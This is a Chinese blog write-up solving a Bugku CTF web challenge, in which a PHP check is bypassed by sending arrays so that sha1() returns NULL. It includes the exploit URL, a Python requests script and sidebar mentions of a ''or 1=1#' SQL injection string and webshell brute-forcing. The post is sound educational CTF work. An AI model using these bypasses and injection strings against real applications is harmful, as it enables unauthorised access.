CTF之Bugku 各种绕过

最新推荐文章于 2024-05-06 21:40:47 发布
最新推荐文章于 2024-05-06 21:40:47 发布
阅读量614 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41607190/article/details/102808258
版权 
<?php 
highlight_file('flag.php'); 
$_GET['id'] = urldecode($_GET['id']); 
$flag = 'flag{xxxxxxxxxxxxxxxxxx}'; 
if (isset($_GET['uname']) and isset($_POST['passwd'])) { 
    if ($_GET['uname'] == $_POST['passwd']) 

        print 'passwd can not be uname.'; 

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin')) 

        die('Flag: '.$flag); 

    else 

        print 'sorry!'; 

} 
?>

写过了之前的绕过,这道题应该不算什么了
1.uname和passwd的值不能相同
2.uname和passwd的sha1()值要相同
3.id的值为margin
要想uname和passwd的sha1值相同比较困难
我们用另一种思路,给这函数传入一个错误的类型,使函数返回错误的值,令这个条件成立

http://123.206.87.240:8002/web7/?id=margin&uname[]=111

后面的&用法相当于&&
然后get传入id和uname,post传passwd

更新一波,用python上传数据

import requests

url='http://123.206.87.240:8002/web7/'
url = url + '?uname[]=111&id=margin'
data={'passwd[]':'123'}
re=requests.post(url, data)
print(type(re))
print(re.text)
InventorMAO
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf php代码审计 绕过,Bugku CTF 之代码审计解题记录
weixin_35870524的博客
04-11 786
前言此笔记为在Bugku CTF平台上做代码审计题目的过程,也算是一篇wp吧extract变量覆盖extract($_GET):$_GET:表示在传递参数时,URL通过get的方式传参,传输的数据以数组的形式封装在$_GET中extract():从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名,数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量file_ge...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugkuCTF 各种绕过
qq_44682929的博客
09-09 204
uname和passwd不能相等,但是sha1后要求相等,这里用到了php sha1绕过漏洞,技巧就是当传入数组时会报错,返回null,如果两个参数都传入数组时会直接相等.可以采用数组绕过的还有md5(),strpos(),strcmp()。另外如果采用==比较,可以利用php弱类型性质。这些数据经过md5加密后均为0e开头,会被视为科学计数法,值为0,所以相等。
CTF(Web)中关于执行读取文件命令的相关知识与绕过技巧
最新发布
2301_79688134的博客
05-06 1457
在我遇到的题目中,想要读取文件必然是要执行cat /flag这个命令,但是题目当然不会这么轻松。让你直接cat出来,必然会有各种各样的滤过条件,你要做的就是尝试各种方法在cat /flag的基础上进行各种操作构建出最终的payload。下面我就总结一下一些比较常见的过滤的条件和绕过方式。(其实过滤条件主要都是对字符的限制,再有就是对长度的限制。
Bugku 各种绕过
a1004070060的博客
06-27 1212
http://123.206.87.240:8002/web7/ 点开链接,显示出需要绕过的代码,简单整理一下绕过条件 id、uname通过get方法传值,passwd通过post方法传值且如果想要进入内层循环必须传入uname和passwd uname和passwd弱类型不相等 uname和passwd加密后的值强相等 id字段url解码后=‘margin’ 通过简单的梳理本题...
ctf 绕过php,Bugku-CTF之各种绕过
weixin_39818014的博客
03-19 330
Bugku-CTF之各种绕过本题要点:php代码审计、hackbar利用highlight_file(‘flag.php‘);$_GET[‘id‘] = urldecode($_GET[‘id‘]);$flag = ‘flag{xxxxxxxxxxxxxxxxxx}‘;if (isset($_GET[‘uname‘]) and isset($_POST[‘passwd‘])) {if ($_GET...
Bugku-CTF之各种绕过
weixin_34406086的博客
05-26 304
Day28 各种绕过 各种绕过哟 http://123.206.87.240:8002/web7/ 本题要点:php代码审计、hackbar利用 阅读代码 发现 只要使uname的sha1的值与passwd的sha1的值相等即可,但是同时他们两个的值又不能相等 构造 http://123.206.87.240:8002/we...
bugku ctf strpos数组绕过
qq_42777804的博客
08-10 2602
<?php $flag = "flag"; if (isset ($_GET['ctf'])) { if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE) echo '必须输入数字才行'; else if (strpos ($_GET['ctf'], '#biubiubiu') !== FALSE) die('Flag: '.$flag); else...
CTFBugku welcome to bugkuctf
weixin_41607190的博客
08-06 413
这道题又拖了好几天- -,各位不要学我。。。 日常抓包 抓到后在proxy中,点击右键发送到这里。 点击Go 分析一波,user、file、pass都是GET方式获取 然后读取的user的内容要和“welcome to bugkuctf”相同 include()是动态获取文件名,也就是这个文件名是hint.php 接着我们要让user的值和我们预想的一样,那就要我们手动传值了 这里用到的是php...
bugku(各种绕过 110)-CTF
筱阳的博客
08-05 1638
      老套路了  
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
CTF之GIF图片分离工具
02-23
misc方向直接GIF图片分离
CTF之二维码扫描.7z
12-02
这个"CTF之二维码扫描.7z"压缩包显然与CTF比赛中的一个环节有关,即二维码扫描。二维码在现代生活中无处不在,它们可以存储各种信息,如网址、文本、联系人信息等。在CTF竞赛中,二维码可能被用作隐藏线索或加密信息...
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
’or 1=1# 初入SQL注入的万能语句
热门推荐
weixin_41607190的博客
09-23 3万+
噢,终于知道CTF里面的那些SQL注入题里面,每题基本都有 id=1’ 这个东西,然后就是一串语句后面加个 # 。 现在终于理解了。至于这个东西为什么叫万能语句,继续看吧。 在介绍之前,先介绍一下我们一般的登陆过程: 输入用户名:“username” 输入密码:“password” 但我们输入完了以后是怎么登陆进去的呢?每个程序都会有一些验证机制。说一种简单的,比如下面这种代码: sql=&amp;amp;am...
CTFBugku网站被黑
weixin_41607190的博客
09-25 9730
点开是这么一个页面 晃来晃去还挺好玩的 标题是网站被黑,用御剑扫描一下他的后台,看能不能扫到webshell,也就是一个后门。(不了解webshell的童鞋去搜下) 扫一下就出来了 点进去是一个输入密码的界面,那么接下来就去爆破密码,用的工具是BurpSuite pro,后面会给大家放上来。 首先要抓包,就是用Burp Suite去截取网页的请求。 ...
图片中藏了文件如何分离
weixin_41607190的博客
04-05 2471
打开kali 先用binwalk分析 可以看到里面有个rar文件,用dd命令将其分离 if是读入的文件名 of是输出的文件名 skip是跳过的字节数 bs是每次读写的字节数大小 ...
CTFBugku 游戏过关
weixin_41607190的博客
07-12 1585
这道题硬是拖了两天。。 下载下来,丢到ida和ollydbg里面 在ollydbg里面运 我们看到ida里面,shift+f12搜索字符串 马上就看到有个flag 做这种逆向的时候字符串搜索是一个很方便的功能,可以更快的找到flag 类似的,ollydbg也有,右键 点智能搜索 窗口的选项可以回到刚刚的界面 我们看到了flag字样接下来就是想怎么样让程序直接执行到这里 这个程序也可以...
CTF挑战:绕过过滤执行命令技巧解析
"ctfshow-web41~60-WP 是一系列关于网络安全竞赛(CTF,Capture The Flag)中的Web安全题目,主要涉及命令注入漏洞的利用与绕过技巧。这些题目逐步增加难度,帮助参赛者提升在实战中发现和解决安全问题的能力。" 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值